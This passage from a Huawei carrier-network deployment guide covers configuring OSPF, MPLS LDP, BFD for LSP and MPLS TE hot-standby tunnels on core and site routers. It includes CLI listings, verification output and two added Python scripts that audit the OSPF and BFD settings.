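The SPE configuration above expresses three security-relevant choices that are easy to get wrong on one of nine devices: interfaces are passive by default and only the listed ones speak OSPF, every active interface is point-to-point (roadmap step 3), and the area is authenticated with a cipher. The audit below is an added example, not Huawei code; it reproduces Core_SPE1's OSPF configuration with the cipher text replaced by a placeholder, and the list of accepted authentication modes is an assumption.

```python
"""Audit of an OSPF process configured like Core_SPE1's in section 2.5.3.2 (added example)."""

# Constructed from the Core_SPE1 configuration above; the cipher value is a placeholder.
CORE_SPE1_OSPF = """\
router id 172.16.0.5
#
interface Eth-Trunk4
 ospf network-type p2p
#
interface Eth-Trunk5
 ospf network-type p2p
#
interface Eth-Trunk17
 ospf network-type p2p
#
interface XGigabitEthernet6/0/4
 ospf network-type p2p
#
ospf 1
 silent-interface all
 undo silent-interface Eth-Trunk4
 undo silent-interface Eth-Trunk5
 undo silent-interface Eth-Trunk17
 undo silent-interface XGigabitEthernet6/0/4
 spf-schedule-interval millisecond 10
 graceful-restart period 600
 flooding-control
 area 0.0.0.0
  authentication-mode md5 1 cipher <CIPHER-PLACEHOLDER>
  network 172.16.0.5 0.0.0.0
  network 172.17.4.2 0.0.0.0
  network 172.17.4.8 0.0.0.0
  network 172.17.4.10 0.0.0.0
  network 172.17.10.2 0.0.0.0
#
"""

# Authentication modes accepted as strong when combined with a cipher (assumption)
STRONG_AUTH_MODES = ("md5", "hmac-md5", "hmac-sha256")


def parse_stanzas(cfg):
    """Split a '#'-separated VRP configuration into {first line: [remaining lines]}."""
    stanzas = {}
    for block in cfg.split("#"):
        lines = [l.strip() for l in block.strip().splitlines() if l.strip()]
        if lines:
            stanzas[lines[0]] = lines[1:]
    return stanzas


def audit_ospf(cfg, process="ospf 1"):
    """Return the set of active OSPF interfaces and a list of findings (empty = clean)."""
    stanzas = parse_stanzas(cfg)
    body = stanzas.get(process, [])
    findings = []
    # Passive by default: only interfaces explicitly re-enabled may send/receive OSPF.
    if "silent-interface all" not in body:
        findings.append(f"{process}: 'silent-interface all' is missing; interfaces are active by default")
    active = {l.split()[-1] for l in body if l.startswith("undo silent-interface ")}
    # Each active interface uses a /31 and therefore must be point-to-point (roadmap step 3).
    for ifname in sorted(active):
        iface_body = stanzas.get(f"interface {ifname}")
        if iface_body is None:
            findings.append(f"{ifname}: OSPF active but the interface is not configured")
        elif "ospf network-type p2p" not in iface_body:
            findings.append(f"{ifname}: OSPF active but network type is not p2p")
    # Area authentication must exist, use a strong mode and store the key as a cipher.
    auth = [l for l in body if l.startswith("authentication-mode ")]
    if not auth:
        findings.append(f"{process}: no area authentication configured")
    elif auth[0].split()[1] not in STRONG_AUTH_MODES or " cipher " not in auth[0]:
        findings.append(f"{process}: weak or plain-text area authentication: {auth[0]}")
    return {"active_interfaces": active, "findings": findings}


if __name__ == "__main__":
    result = audit_ospf(CORE_SPE1_OSPF)
    print("active OSPF interfaces:", ", ".join(sorted(result["active_interfaces"])))
    for line in result["findings"] or ["no findings"]:
        print(line)
```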

Checking the Configuration


l Run the display ospf peer command to check OSPF neighbor information. Using
Core_SPE1 as an example, if the value of State is Full, the OSPF neighbor relationships
have been set up successfully.
[Core_SPE1]display ospf peer

OSPF Process 1 with Router ID 172.16.0.5


Neighbors

Area 0.0.0.0 interface 172.17.4.8(Eth-Trunk4)'s neighbors


Router ID: 172.16.0.3 Address: 172.17.4.9 GR State: Normal
State: Full Mode:Nbr is Slave Priority: 1
DR: None BDR: None MTU: 0
Dead timer due in 40 sec
Retrans timer interval: 4
Neighbor is up for 00:53:42
Authentication Sequence: [ 0 ]

Neighbors

Area 0.0.0.0 interface 172.17.4.2(Eth-Trunk5)'s neighbors


Router ID: 172.16.0.4 Address: 172.17.4.3 GR State: Normal
State: Full Mode:Nbr is Master Priority: 1
DR: None BDR: None MTU: 0
Dead timer due in 37 sec
Retrans timer interval: 4
Neighbor is up for 00:53:22
Authentication Sequence: [ 0 ]

Neighbors

Area 0.0.0.0 interface 172.17.4.10(Eth-Trunk17)'s neighbors


Router ID: 172.16.2.51 Address: 172.17.4.11 GR State: Normal
State: Full Mode:Nbr is Slave Priority: 1
DR: None BDR: None MTU: 0
Dead timer due in 31 sec
Retrans timer interval: 4
Neighbor is up for 00:53:34
Authentication Sequence: [ 0 ]

Neighbors

Area 0.0.0.0 interface 172.17.10.2(XGigabitEthernet6/0/4)'s neighbors


Router ID: 172.16.2.86 Address: 172.17.10.3 GR State: Normal
State: Full Mode:Nbr is Master Priority: 1
DR: None BDR: None MTU: 0


Dead timer due in 32 sec


Retrans timer interval: 5
Neighbor is up for 00:53:42
Authentication Sequence: [ 0 ]

2.5.4 Deploying MPLS LDP


When MPLS LDP is deployed on a network, LDP LSPs can be set up to bear services.

2.5.4.1 Configuration Roadmap

Figure 2-17 MPLS LDP topology

[Figure: the topology of Figure 2-15 with the LDP LSPs, numbered 1 to 12, drawn over the links between Core_SPE1, Core_SPE2, Core_SPE3 and the UPEs Site1_UPE1, Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5 and Site3_UPE6; CE1, CE2 and CE3 belong to vpna. Legend: LDP LSP.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure an LSR ID and enable MPLS LDP globally and on each interface.
2. Configure synchronization between LDP and OSPF to prevent traffic loss caused by
switchovers of the primary and backup LSPs.
3. Configure LDP GR so that traffic forwarding is not interrupted upon primary/backup
switchovers and protocol restarts.
4. Configure BFD for LSP to quickly detect LDP LSP faults on the core ring.

2.5.4.2 Data Plan


NOTE

The data provided in this section is used as an example, which may vary depending on the network scale and
topology.

Plan data before configuring MPLS LDP.

Table 2-17 MPLS parameters

Parameter          Value                                    Remarks
mpls lsr-id        IP address of LSR loopback interface 1   Configure LSR IDs before running MPLS commands.
label advertise    non-null                                 Disable penultimate hop popping (PHP) because it
                                                            affects switchover performance.
bfd bind ldp-lsp   discriminator local                      Configure static BFD for LDP LSPs. Set the local
                   discriminator remote                     discriminator of the local system to be the same as
                   detect-multiplier                        the remote discriminator of the remote system, and
                   min-tx-interval                          adjust the local detection multiplier of BFD. Set the
                   min-rx-interval                          minimum interval at which BFD packets are sent and
                   process-pst                              received to 3.3 ms. Allow BFD sessions to change the
                                                            port status table (PST) to speed up switchovers.

2.5.4.3 Enabling MPLS LDP

Procedure
l Configure SPEs.
The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
mpls lsr-id 172.16.0.5 //Configure an MPLS LSR ID. The IP address of a loopback interface is recommended.
mpls //Enable MPLS globally.
label advertise non-null //Disable PHP so that the egress node assigns labels to the penultimate hop properly.
#
mpls ldp //Enable MPLS LDP globally.
#
interface Eth-Trunk4
mpls
mpls ldp //Enable MPLS LDP on an interface.


#
interface Eth-Trunk5
mpls
mpls ldp //Enable MPLS LDP on an interface.
#
interface Eth-Trunk17
mpls
mpls ldp //Enable MPLS LDP on an interface.
#
interface XGigabitEthernet6/0/4
mpls
mpls ldp //Enable MPLS LDP on an interface.
#

l Configure UPEs.
The following uses the configuration of Site1_UPE1 as an example. The configurations
of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
mpls lsr-id 172.16.2.51 //Configure an MPLS LSR ID. The IP address of a loopback interface is recommended.
mpls //Enable MPLS globally.
label advertise non-null //Disable PHP so that the egress node assigns labels to the penultimate hop properly.
#
mpls ldp //Enable MPLS LDP globally.
#
interface Eth-Trunk7
mpls
mpls ldp //Enable MPLS LDP on an interface.
#
interface Eth-Trunk17
mpls
mpls ldp //Enable MPLS LDP on an interface.
#

----End

Checking the Configuration


l Run the display mpls ldp session all command to view the MPLS LDP session status.
Using Core_SPE1 as an example, if the value of Status is Operational, an MPLS LDP
session has been set up successfully.
[Core_SPE1]display mpls ldp session all

LDP Session(s) in Public Network


Codes: LAM(Label Advertisement Mode), SsnAge Unit(DDDD:HH:MM)
A '*' before a session means the session is being deleted.

------------------------------------------------------------------------------
PeerID Status LAM SsnRole SsnAge KASent/Rcv

------------------------------------------------------------------------------
172.16.0.3:0 Operational DU Passive 0000:00:56 226/226
172.16.0.4:0 Operational DU Active 0000:00:56 226/226
172.16.2.51:0 Operational DU Passive 0000:00:55 223/223
172.16.2.86:0 Operational DU Passive 0000:00:55 223/223

------------------------------------------------------------------------------
TOTAL: 4 session(s) Found.


2.5.4.4 Configuring Synchronization Between LDP and OSPF

Context
LDP LSRs set up LSPs using OSPF. When an LDP session fault (non-link fault) occurs on the
primary LSP or the primary LSP recovers from a fault, synchronization between LDP and
OSPF can prevent traffic loss caused by switchovers of the primary and backup LSPs.

Procedure
l Configure SPEs.

The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
interface Eth-Trunk4
ospf ldp-sync //Enable synchronization between LDP and OSPF on the protected interface.
ospf timer ldp-sync hold-down 20 //Set a Hold-down time that an interface uses to delay setting up an OSPF neighbor relationship until an LDP session is set up.
#
interface Eth-Trunk5
ospf ldp-sync
ospf timer ldp-sync hold-down 20
#
interface Eth-Trunk17
ospf ldp-sync
ospf timer ldp-sync hold-down 20
#
interface XGigabitEthernet6/0/4
ospf ldp-sync
ospf timer ldp-sync hold-down 20
#

l Configure UPEs.

The following uses the configuration of Site1_UPE1 as an example. The configurations


of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
interface Eth-Trunk7
ospf ldp-sync
ospf timer ldp-sync hold-down 20
#
interface Eth-Trunk17
ospf ldp-sync
ospf timer ldp-sync hold-down 20
#

----End

2.5.4.5 Configuring LDP GR

Context
LDP GR can be configured so that traffic forwarding is not interrupted upon primary/backup
switchovers and protocol restarts.


Procedure
l Configure SPEs.
The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
mpls ldp
graceful-restart //Enable LDP GR.
#

l Configure UPEs.
The following uses the configuration of Site1_UPE1 as an example. The configurations
of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
mpls ldp
graceful-restart
#

----End

2.5.4.6 Configuring BFD for LSP

Context
To ensure reliability of LDP LSPs between SPEs on the core ring, configure BFD to detect
LDP LSPs quickly.

Procedure
l Configure SPEs.
The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
bfd SPE1toSPE2 bind ldp-lsp peer-ip 172.16.0.3 nexthop 172.17.4.9 interface Eth-Trunk4 //Enable static BFD to detect the LDP LSP between SPE1 and SPE2.
discriminator local 317 //Set the local discriminator. The local discriminator of the local system must be the same as the remote discriminator of the remote system.
discriminator remote 137 //Set the remote discriminator.
detect-multiplier 8 //Set the local detection multiplier of BFD.
min-tx-interval 3 //Set the minimum interval at which the local device sends BFD packets to 3.3 ms.
min-rx-interval 3 //Set the minimum interval at which the local device receives BFD packets to 3.3 ms.
process-pst //Allow BFD sessions to change the PST to speed up switchovers.
commit //Commit the BFD session configuration.
#
bfd SPE1toSPE3 bind ldp-lsp peer-ip 172.16.0.4 nexthop 172.17.4.3 interface Eth-Trunk5 //Enable static BFD to detect the LDP LSP between SPE1 and SPE3.
discriminator local 32
discriminator remote 23
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#

----End
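A static BFD session only comes up when the local discriminator on one end equals the remote discriminator on the other, and the 50 ms target claimed in 2.5.2.4 depends on the multiplier and intervals of both ends. The cross-check below is an added example, not Huawei code: Core_SPE1's two sessions are the page's, the session on Core_SPE2 is a constructed mirror (its name and nexthop are assumptions, since the page only says the configuration is similar), and a configured interval of 3 is read as 3.3 ms, as the page states.

```python
"""Cross-check of the static BFD for LSP sessions of section 2.5.4.6 (added example)."""
import re

# Core_SPE1's sessions as configured on the page
CORE_SPE1 = """\
bfd SPE1toSPE2 bind ldp-lsp peer-ip 172.16.0.3 nexthop 172.17.4.9 interface Eth-Trunk4
 discriminator local 317
 discriminator remote 137
 detect-multiplier 8
 min-tx-interval 3
 min-rx-interval 3
 process-pst
 commit
#
bfd SPE1toSPE3 bind ldp-lsp peer-ip 172.16.0.4 nexthop 172.17.4.3 interface Eth-Trunk5
 discriminator local 32
 discriminator remote 23
 detect-multiplier 8
 min-tx-interval 3
 min-rx-interval 3
 process-pst
 commit
#
"""
# Constructed mirror session on Core_SPE2 (assumption; not on the page)
CORE_SPE2 = """\
bfd SPE2toSPE1 bind ldp-lsp peer-ip 172.16.0.5 nexthop 172.17.4.8 interface Eth-Trunk4
 discriminator local 137
 discriminator remote 317
 detect-multiplier 8
 min-tx-interval 3
 min-rx-interval 3
 process-pst
 commit
#
"""

HEADER = re.compile(r"bfd (\S+) bind ldp-lsp peer-ip (\S+) nexthop (\S+) interface (\S+)")


def interval_ms(value):
    """The page reads a configured value of 3 as 3.3 ms; other values are taken as ms."""
    return 3.3 if value == 3 else float(value)


def parse_bfd(cfg, lsr_id):
    """Return {local discriminator: session dict} for one device's 'bfd ... bind ldp-lsp' stanzas."""
    sessions = {}
    for block in cfg.split("#"):
        lines = [l.strip() for l in block.strip().splitlines() if l.strip()]
        m = HEADER.match(lines[0]) if lines else None
        if not m:
            continue
        s = {"name": m.group(1), "lsr_id": lsr_id, "peer_ip": m.group(2),
             "nexthop": m.group(3), "interface": m.group(4),
             "process_pst": "process-pst" in lines, "committed": "commit" in lines}
        for line in lines[1:]:
            parts = line.split()
            if parts[0] == "discriminator":
                s[parts[1]] = int(parts[2])              # key is 'local' or 'remote'
            elif parts[0] in ("detect-multiplier", "min-tx-interval", "min-rx-interval"):
                s[parts[0]] = int(parts[1])
        sessions[s["local"]] = s
    return sessions


def detection_time_ms(local, remote):
    """RFC 5880 section 6.8.4: remote multiplier x max(local min-rx, remote min-tx)."""
    return remote["detect-multiplier"] * max(interval_ms(local["min-rx-interval"]),
                                             interval_ms(remote["min-tx-interval"]))


def check_session(local, peer_sessions, budget_ms=50.0):
    """Return (findings, detection time in ms or None) for one end of a session."""
    findings = []
    if not local["committed"]:
        findings.append(f"{local['name']}: not committed, the session is inactive")
    if not local["process_pst"]:
        findings.append(f"{local['name']}: process-pst missing, the PST will not be updated")
    remote = peer_sessions.get(local["remote"])
    if remote is None:
        findings.append(f"{local['name']}: peer has no session with local discriminator {local['remote']}")
        return findings, None
    if remote["remote"] != local["local"]:
        findings.append(f"{local['name']}: peer expects remote discriminator {remote['remote']}, "
                        f"ours is {local['local']}")
    if remote["peer_ip"] != local["lsr_id"] or local["peer_ip"] != remote["lsr_id"]:
        findings.append(f"{local['name']}: peer-ip does not match the other end's LSR ID")
    dt = detection_time_ms(local, remote)
    if dt > budget_ms:
        findings.append(f"{local['name']}: detection time {dt:.1f} ms exceeds {budget_ms:.0f} ms")
    return findings, dt


if __name__ == "__main__":
    spe1 = parse_bfd(CORE_SPE1, "172.16.0.5")
    spe2 = parse_bfd(CORE_SPE2, "172.16.0.3")
    for session in spe1.values():
        findings, dt = check_session(session, spe2)
        print(session["name"], "detection time:", dt, "ms;", findings or "ok")
```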


Checking the Configuration


l Run the display bfd session all for-lsp command to check the BFD for LSP session
status. Using Core_SPE1 as an example, if BFD sessions with the tunnel type being
S_LDP_LSP are all in Up state, BFD for LSP sessions have been set up successfully.
[Core_SPE1]display bfd session all for-lsp
--------------------------------------------------------------------------------
Local Remote PeerIpAddr State Type InterfaceName
--------------------------------------------------------------------------------
32 23 172.16.0.4 Up S_LDP_LSP Eth-Trunk4
317 137 172.16.0.3 Up S_LDP_LSP Eth-Trunk5
--------------------------------------------------------------------------------
Total UP/DOWN Session Number : 2/0

2.5.5 Deploying MPLS TE


When MPLS TE is deployed on a network, TE tunnels can be set up to bear services.

2.5.5.1 Configuration Roadmap

Figure 2-18 MPLS TE topology

[Figure: TE tunnels between Site2_UPE3 and Site2_UPE4 on one side and Core_SPE2 and Core_SPE3 on the other. Primary TE1 and backup TE2 originate at Site2_UPE3; primary TE3 and backup TE4 originate at Site2_UPE4. The candidate paths are numbered 1 to 8 as referenced in the roadmap below.]

Legend: Primary path of a TE tunnel; Backup path of a TE tunnel. Dashed lines in the same color indicate the primary and backup paths of a TE tunnel. Pipes indicate primary and backup TE tunnels of L3VPN services.

The configuration roadmap is as follows:

1. Enable MPLS TE.


2. Globally enable MPLS, MPLS TE and MPLS TE CSPF on each node along TE tunnels,
and deploy MPLS and MPLS TE on each interface along the TE tunnels.
3. Configure tunnel paths, enable each node to use primary and backup TE tunnels, and
configure primary and backup CR-LSPs using the affinity attribute.
4. Create L3VPN service tunnels.
a. Create primary tunnels.
n Create primary tunnel TE1 between Site2_UPE3 and Core_SPE2. Specify path
1 as the primary CR-LSP and path 2 as the backup CR-LSP.
n Create primary tunnel TE3 between Site2_UPE4 and Core_SPE3. Specify path
5 as the primary CR-LSP and path 6 as the backup CR-LSP.
b. Create backup tunnels.
n Create backup tunnel TE2 between Site2_UPE3 and Core_SPE3, which is the
backup tunnel of primary tunnel TE1. Specify path 3 as the primary CR-LSP
and path 4 as the backup CR-LSP.
n Create backup tunnel TE4 between Site2_UPE4 and Core_SPE2, which is the
backup tunnel of primary tunnel TE3. Specify path 7 as the primary CR-LSP
and path 8 as the backup CR-LSP.
c. Configure RSVP GR.
Enable RSVP GR on all devices to prevent network disconnection and recover
dynamic CR-LSPs upon switchovers on RSVP nodes.
d. Configure BFD for CR-LSP.
Configure static BFD for CR-LSP on all devices to speed up switchovers of the
primary and backup CR-LSPs.
5. Create a tunnel policy.
Configure TE tunnels to be preferentially selected.

2.5.5.2 Data Plan

NOTE

The data provided in this section is used as an example, which may vary depending on the network scale and
topology.

Table 2-18 MPLS parameters

Parameter                    Value   Remarks
mpls te                      -       Enable MPLS TE.
mpls rsvp-te                 -       Enable MPLS RSVP-TE.
mpls rsvp-te hello           -       Enable the RSVP Hello extension mechanism.
mpls rsvp-te hello full-gr   -       Enable the RSVP GR and RSVP GR Helper capabilities of the GR node.
mpls te cspf                 -       Enable the MPLS TE CSPF algorithm.

Table 2-19 MPLS TE tunnel parameters

Parameter                    Value                                  Remarks
interface Tunnel             Number of a tunnel interface           It is recommended that tunnel IDs be associated with
                                                                    device names and descriptions be added for tunnel
                                                                    interfaces.
ip address unnumbered        interface LoopBack1                    Configure a tunnel interface to borrow an IP address
                                                                    from loopback interface 1.
tunnel-protocol              mpls te                                Enable the TE tunnel function.
destination                  IP address of remote loopback          Specify the destination IP address.
                             interface 1
mpls te tunnel-id            Tunnel ID                              Set a tunnel ID.
mpls te affinity property    -                                      Configure the affinity attribute for the primary and
                                                                    backup CR-LSPs based on link management group
                                                                    attributes.
mpls te backup               hot-standby                            Configure the hot standby mode of the tunnel.
bfd bind mpls-te interface   discriminator local                    Configure static BFD to detect the backup CR-LSP of
Tunnel te-lsp                discriminator remote                   a TE tunnel. Set the local discriminator of the local
                             detect-multiplier                      system to be the same as the remote discriminator of
                             min-tx-interval                        the remote system, and adjust the local detection
                             min-rx-interval                        multiplier of BFD. Set the minimum interval at which
                             process-pst                            BFD packets are sent and received to 3.3 ms. Allow
                                                                    BFD sessions to change the PST to speed up
                                                                    switchovers.
bfd bind mpls-te interface   discriminator local                    Configure static BFD to detect the primary CR-LSP of
Tunnel                       discriminator remote                   a TE tunnel. Set the local discriminator of the local
                             detect-multiplier                      system to be the same as the remote discriminator of
                             min-tx-interval                        the remote system, and adjust the local detection
                             min-rx-interval                        multiplier of BFD. Set the minimum interval at which
                             process-pst                            BFD packets are sent and received to 3.3 ms. Allow
                                                                    BFD sessions to change the PST to speed up
                                                                    switchovers.
tunnel-policy                Tunnel policy name: TSel               Configure tunnel policies for preferentially selecting
                             tunnel select-seq cr-lsp lsp           CR-LSPs.
                             load-balance-number 1
                             Tunnel policy on the core device: TE
                             tunnel select-seq cr-lsp
                             load-balance-number 1

Table 2-20 MPLS TE tunnel list

Tunnel                                              Tunnel Interface   Tunnel ID
Core_SPE1 to Site1_UPE1 / Site1_UPE1 to Core_SPE1   Tunnel611          71
Core_SPE1 to Site1_UPE2 / Site1_UPE2 to Core_SPE1   Tunnel622          82
Core_SPE1 to Site3_UPE5 / Site3_UPE5 to Core_SPE1   Tunnel721          312
Core_SPE1 to Site3_UPE6 / Site3_UPE6 to Core_SPE1   Tunnel711          311
Core_SPE2 to Site2_UPE3 / Site2_UPE3 to Core_SPE2   Tunnel111          111
Core_SPE2 to Site2_UPE4 / Site2_UPE4 to Core_SPE2   Tunnel121          121
Core_SPE2 to Site1_UPE1 / Site1_UPE1 to Core_SPE2   Tunnel612          72
Core_SPE2 to Site1_UPE2 / Site1_UPE2 to Core_SPE2   Tunnel621          81
Core_SPE3 to Site2_UPE3 / Site2_UPE3 to Core_SPE3   Tunnel112          112
Core_SPE3 to Site2_UPE4 / Site2_UPE4 to Core_SPE3   Tunnel122          122
Core_SPE3 to Site3_UPE5 / Site3_UPE5 to Core_SPE3   Tunnel722          322
Core_SPE3 to Site3_UPE6 / Site3_UPE6 to Core_SPE3   Tunnel712          321

2.5.5.3 Configuring MPLS TE Tunnels and Hot Standby

Procedure
l Configure SPEs.
The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
mpls
mpls te //Enable MPLS TE globally.
mpls rsvp-te //Enable RSVP-TE.
mpls te cspf //Enable the CSPF algorithm.
#
interface Eth-Trunk4
mpls te //Enable MPLS TE on an interface.
mpls te link administrative group c //Configure the link management group
attribute for the TE tunnel to select primary and backup paths.
mpls rsvp-te //Enable RSVP-TE on an interface.
#
interface Eth-Trunk5
mpls te
mpls te link administrative group 30
mpls rsvp-te
#
interface Eth-Trunk17
mpls te
mpls te link administrative group 4
mpls rsvp-te
#
interface XGigabitEthernet6/0/4
mpls te
mpls te link administrative group 20
mpls rsvp-te
#
ospf 1
opaque-capability enable //Enable the Opaque capability of OSPF.


area 0.0.0.0
mpls-te enable //Enable MPLS TE in the OSPF area.
#
interface Tunnel611 //Specify the tunnel from Core_SPE1 to Site1_UPE1.
description Core_SPE1 to Site1_UPE1 //Configure the interface description.
ip address unnumbered interface LoopBack1 //Configure a tunnel interface
to borrow the IP address of a loopback interface.
tunnel-protocol mpls te //Set the tunnel protocol to MPLS TE.
destination 172.16.2.51 //Configure the IP address of Site1_UPE1 as the
tunnel destination IP address.
mpls te tunnel-id 71 //Configure a tunnel ID, which must be valid and
unique on the local device.
mpls te record-route //Configure the tunnel to record detailed route
information for maintenance.
mpls te affinity property 4 mask 4 //Configure the affinity attribute of
the primary CR-LSP for selecting the optimal forwarding path.
mpls te affinity property 8 mask 8 secondary //Configure the affinity
attribute of the backup CR-LSP.
mpls te backup hot-standby //Configure the hot standby mode of tunnels.
mpls te commit //Commit all the MPLS TE configuration of the tunnel for
the configuration to take effect.
#
interface Tunnel622
description Core_SPE1 to Site1_UPE2
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.50
mpls te tunnel-id 82
mpls te record-route
mpls te affinity property 8 mask 8
mpls te affinity property 4 mask 4 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel711
description Core_SPE1 to Site3_UPE6
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.86
mpls te tunnel-id 311
mpls te record-route
mpls te affinity property 20 mask 20
mpls te affinity property 10 mask 10 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel721
description Core_SPE1 to Site3_UPE5
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.87
mpls te tunnel-id 312
mpls te record-route
mpls te affinity property 10 mask 10
mpls te affinity property 20 mask 20 secondary
mpls te backup hot-standby
mpls te commit
#
tunnel-policy TSel //Configure a tunnel policy.
tunnel select-seq cr-lsp lsp load-balance-number 1 //Configure the CR-LSP
to be preferentially selected.
#
tunnel-policy TE
tunnel select-seq cr-lsp load-balance-number 1
#

l Configure UPEs.
The following uses the configuration of Site1_UPE1 as an example. The configurations
of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
mpls
mpls te //Enable MPLS TE globally.
mpls rsvp-te //Enable RSVP-TE.
mpls te cspf //Enable the CSPF algorithm.
#
interface Eth-Trunk7
mpls te //Enable MPLS TE on an interface.
mpls te link administrative group c //Configure the link management group
attribute for the TE tunnel to select primary and backup paths.
mpls rsvp-te //Enable RSVP-TE on an interface.
#
interface Eth-Trunk17
mpls te
mpls te link administrative group 4
mpls rsvp-te
#
ospf 1
opaque-capability enable //Enable the Opaque capability of OSPF.
area 0.0.0.0
mpls-te enable //Enable MPLS TE in the OSPF area.
#
interface Tunnel611 //Specify the tunnel from Site1_UPE1 to Core_SPE1.
description Site1_UPE1 to Core_SPE1 //Configure the interface description.
ip address unnumbered interface LoopBack1 //Configure a tunnel interface
to borrow the IP address of a loopback interface.
tunnel-protocol mpls te //Set the tunnel protocol to MPLS TE.
destination 172.16.0.5 //Configure the IP address of Core_SPE1 as the tunnel
destination IP address.
mpls te tunnel-id 71 //Configure a tunnel ID, which must be valid and
unique on the local device.
mpls te record-route //Configure the tunnel to record detailed route
information for maintenance.
mpls te affinity property 4 mask 4 //Configure the affinity attribute of
the primary CR-LSP for selecting the optimal forwarding path.
mpls te affinity property 8 mask 8 secondary //Configure the affinity
attribute of the backup CR-LSP.
mpls te backup hot-standby //Configure the hot standby mode of tunnels.
mpls te commit //Commit all the MPLS TE configuration of the tunnel for
the configuration to take effect.
#
interface Tunnel612
description Site1_UPE1 to Core_SPE2
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.3
mpls te tunnel-id 72
mpls te record-route
mpls te affinity property 4 mask 4
mpls te affinity property 8 mask 8 secondary
mpls te backup hot-standby
mpls te commit
#
tunnel-policy TSel //Configure a tunnel policy.
tunnel select-seq cr-lsp lsp load-balance-number 1 //Configure the CR-LSP
to be preferentially selected.
#

----End

Checking the Configuration


l Run the display mpls te tunnel-interface Tunnel command to check local tunnel
interface information.


Using tunnel 611 from Core_SPE1 to Site1_UPE1 as an example, if both the primary
and backup LSPs of tunnel 611 are in UP state, the primary and backup LSPs have been
set up successfully.
[Core_SPE1]display mpls te tunnel-interface Tunnel611
----------------------------------------------------------------
Tunnel611
----------------------------------------------------------------
Tunnel State Desc : UP
Active LSP : Primary LSP
Session ID : 71
Ingress LSR ID : 172.16.0.5 Egress LSR ID: 172.16.2.51
Admin State : UP Oper State : UP
Primary LSP State : UP
Main LSP State : READY LSP ID : 1
Hot-Standby LSP State : UP
Main LSP State : READY LSP ID : 32772

l Run the display mpls te hot-standby state all command to view status of all HSB
tunnels.
Using Core_SPE1 as an example, if all HSB tunnels of Core_SPE1 are in Primary LSP
state, traffic has been switched to primary CR-LSPs.
[Core_SPE1]display mpls te hot-standby state all
---------------------------------------------------------------------
No. tunnel name session id switch result
---------------------------------------------------------------------
1 Tunnel611 71 Primary LSP
2 Tunnel622 82 Primary LSP
3 Tunnel711 311 Primary LSP
4 Tunnel721 312 Primary LSP

l Run the ping lsp te tunnel command to check bidirectional connectivity of the master
and backup TE tunnels of each device.
Using tunnel 611 from Core_SPE1 to Site1_UPE1 as an example, run the following ping
commands on both ends of the TE tunnel:
[Core_SPE1] ping lsp te Tunnel611
LSP PING FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 : 100 data bytes,
press CTRL_C to break
Reply from 172.16.2.51: bytes=100 Sequence=1 time=5 ms
Reply from 172.16.2.51: bytes=100 Sequence=2 time=3 ms
Reply from 172.16.2.51: bytes=100 Sequence=3 time=3 ms
Reply from 172.16.2.51: bytes=100 Sequence=4 time=2 ms
Reply from 172.16.2.51: bytes=100 Sequence=5 time=3 ms

--- FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 2/3/5 ms
[Core_SPE1] ping lsp te Tunnel611 hot-standby
LSP PING FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 : 100 data bytes,
press CTRL_C to break
Reply from 172.16.2.51: bytes=100 Sequence=1 time=2 ms
Reply from 172.16.2.51: bytes=100 Sequence=2 time=2 ms
Reply from 172.16.2.51: bytes=100 Sequence=3 time=3 ms
Reply from 172.16.2.51: bytes=100 Sequence=4 time=2 ms
Reply from 172.16.2.51: bytes=100 Sequence=5 time=3 ms

--- FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 2/2/3 ms

l Run the tracert lsp te Tunnel command to detect LSPs.


Using tunnel 611 from Core_SPE1 to Site1_UPE1 as an example, ensure that the
primary and backup tunnel paths are different.
[Core_SPE1]tracert lsp te Tunnel611
LSP Trace Route FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 , press CTRL_C
to break.
TTL Replier Time Type Downstream
0 Ingress 172.17.4.11/[1078 ]
1 172.16.2.51 3 ms Egress
[Core_SPE1]tracert lsp te Tunnel611 hot-standby
LSP Trace Route FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 , press CTRL_C
to break.
TTL Replier Time Type Downstream
0 Ingress 172.17.4.9/[1391 ]
1 172.17.4.9 3 ms Transit 172.17.4.13/[1169 ]
2 172.17.4.13 7 ms Transit 172.17.4.14/[1109 ]
3 172.16.2.51 4 ms Egress
